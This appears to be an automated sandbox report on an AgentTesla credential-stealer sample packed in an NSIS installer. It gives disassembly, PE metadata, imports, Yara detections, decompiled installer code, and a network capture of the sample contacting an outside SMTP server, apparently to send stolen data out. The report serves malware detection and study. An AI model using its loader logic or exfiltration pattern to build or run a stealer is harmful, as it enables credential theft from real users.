push 00000008h
mov dword ptr [00423F58h], eax
call 00007F74A4D1EBB0h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007F74A4D1E867h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F74A4D1E855h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F74A4D1C07Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F74A4D1E348h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F74A4D1C0D5h
cmp cl, 00000020h
jne 00007F74A4D1C078h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F74A4D1C06Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x900	0xa00	False	0.409375	data	3.94693169534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 04:16:39.761667967 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:39.816807985 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:39.816948891 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.092539072 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.092818022 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.148051023 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.148118019 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.148405075 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.203632116 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.229621887 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.285772085 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.285818100 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.285877943 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.285907984 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.285944939 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.286024094 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.333262920 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.388742924 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.438467979 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.493802071 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.494342089 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.549669981 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.550070047 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.621265888 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.621648073 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.685411930 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.685832977 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.744864941 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.745228052 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.800592899 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.801899910 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802078962 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802279949 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802390099 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802503109 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802592993 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802808046 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.802967072 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803061008 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803212881 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803318977 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803417921 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803519011 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803611994 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803725004 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.803829908 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.857125044 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.857234001 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.857278109 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.857341051 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.857449055 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.857523918 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.857884884 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.857960939 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.858156919 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.858256102 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.858318090 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.858386993 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.858588934 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.858660936 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.858766079 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.858836889 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.912450075 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.912528992 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.912564039 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.912645102 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.912971020 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.912998915 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.913067102 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.913104057 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.913258076 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.913347006 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.913552046 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.913614988 CET	49760	587	192.168.2.4	77.88.21.158
Jan 14, 2022 04:16:40.913620949 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.913898945 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.967741013 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.967787027 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.967811108 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.967837095 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968221903 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968250990 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968275070 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968300104 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968494892 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968523026 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968693018 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968722105 CET	587	49760	77.88.21.158	192.168.2.4
Jan 14, 2022 04:16:40.968800068 CET	49760	587	192.168.2.4	77.88.21.158

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 04:16:39.710926056 CET	49714	53	192.168.2.4	8.8.8.8
Jan 14, 2022 04:16:39.729899883 CET	53	49714	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2022 04:16:39.710926056 CET	192.168.2.4	8.8.8.8	0xe7fd	Standard query (0)	smtp.yandex.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2022 04:15:58.456048965 CET	8.8.8.8	192.168.2.4	0x6035	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2022 04:16:39.729899883 CET	8.8.8.8	192.168.2.4	0xe7fd	No error (0)	smtp.yandex.com	smtp.yandex.ru		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2022 04:16:39.729899883 CET	8.8.8.8	192.168.2.4	0xe7fd	No error (0)	smtp.yandex.ru		77.88.21.158	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 14, 2022 04:16:40.092539072 CET	587	49760	77.88.21.158	192.168.2.4	220 vla5-8422ddc3185d.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1642130200-NCDFImhoWk-GdQSG1m3
Jan 14, 2022 04:16:40.092818022 CET	49760	587	192.168.2.4	77.88.21.158	EHLO 305090
Jan 14, 2022 04:16:40.148118019 CET	587	49760	77.88.21.158	192.168.2.4	250-vla5-8422ddc3185d.qloud-c.yandex.net 250-8BITMIME 250-PIPELINING 250-SIZE 53477376 250-STARTTLS 250-AUTH LOGIN PLAIN XOAUTH2 250-DSN 250 ENHANCEDSTATUSCODES
Jan 14, 2022 04:16:40.148405075 CET	49760	587	192.168.2.4	77.88.21.158	STARTTLS
Jan 14, 2022 04:16:40.203632116 CET	587	49760	77.88.21.158	192.168.2.4	220 Go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 3NeufRwoxF.exe PID: 4484 Parent PID: 6372

General

Start time:	04:16:03
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\3NeufRwoxF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3NeufRwoxF.exe"
Imagebase:	0x400000
File size:	271670 bytes
MD5 hash:	891FAFCB65F039CEFAC6701BFB8A9253
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 3NeufRwoxF.exe PID: 4828 Parent PID: 4484

General

Start time:	04:16:04
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\3NeufRwoxF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3NeufRwoxF.exe"
Imagebase:	0x400000
File size:	271670 bytes
MD5 hash:	891FAFCB65F039CEFAC6701BFB8A9253
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 3NeufRwoxF.exe PID: 4484 Parent PID: 6372 3NeufRwoxF.exeCOMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	6.1%
Signature Coverage:	22.2%
Total number of Nodes:	1340
Total number of Limit Nodes:	25

Executed Functions

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
